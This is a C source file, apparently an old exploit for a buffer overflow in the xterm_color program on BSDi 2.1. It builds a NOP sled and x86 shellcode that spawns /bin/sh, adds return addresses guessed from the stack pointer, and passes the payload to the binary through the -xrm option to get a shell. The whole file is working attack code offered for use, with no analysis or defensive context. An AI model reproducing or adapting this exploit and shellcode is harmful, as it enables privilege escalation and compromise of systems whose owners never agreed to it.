/* xterm_color buffer overflow exploit for BsDi ... tested on BsDi 2.1 pukvis */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define XTERM_COLOR_PATH "/usr/X11R6/bin/xterm_color" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i,OffSet = DEFAULT_OFFSET; if (argc>1) OffSet = atoi(argv[1]); buff = malloc(2048); if(!buff) { printf("mA1o pJaMJeti !!!\n"); exit(0); } ptr = buff; for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE; i+=NOP_SIZE) { memcpy (ptr,nop,NOP_SIZE); ptr+=NOP_SIZE; } for(i=0;i < strlen(shellcode);i++) *(ptr++) = shellcode[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_sp() + OffSet; ptr = (char *)addr_ptr; *ptr = 0; (void) fprintf(stderr, "try if it goes - check your id\n"); execl(XTERM_COLOR_PATH, "xterm_color", "-xrm",buff, NULL); }